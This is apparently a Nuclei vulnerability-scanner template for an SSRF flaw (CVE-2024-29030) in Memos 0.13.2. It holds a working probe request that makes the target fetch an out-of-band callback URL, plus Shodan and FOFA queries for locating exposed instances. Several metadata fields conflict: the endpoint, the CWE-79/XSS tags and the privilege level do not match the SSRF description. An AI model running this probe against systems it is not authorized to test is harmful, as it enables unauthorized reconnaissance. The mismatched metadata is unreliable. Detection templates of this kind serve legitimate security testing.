漏洞描述
An SSRF vulnerability exists at the `/api/resource` that allows authenticated users to enumerate the internal network.
id: CVE-2024-29030
info:
name: Memos 0.13.2 - Server-Side Request Forgery
author: ritikchaddha
severity: medium
description: |
An SSRF vulnerability exists at the `/api/resource` that allows authenticated users to enumerate the internal network.
reference:
- https://securitylab.github.com/advisories/GHSL-2023-154_GHSL-2023-156_memos/
- https://nvd.nist.gov/vuln/detail/CVE-2024-29030
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
shodan-query: title:"Memos"
fofa-query: title="Memos"
tags: cve,cve2024,xss,memos
http:
- method: GET
path:
- "{{BaseURL}}/o/get/resource?url=https://{{interactsh-url}}"
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(tolower(body), "memos")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402203d8b3bae351cdeeb75643655cdb1e3606f1d2b07545805e88330c737489a1bec02207a301f7216741fbcafd3ec68e9bbfab95a8d4b58c397c7f81e1929f2f8282956:922c64590222798bb761d5b6d8e72950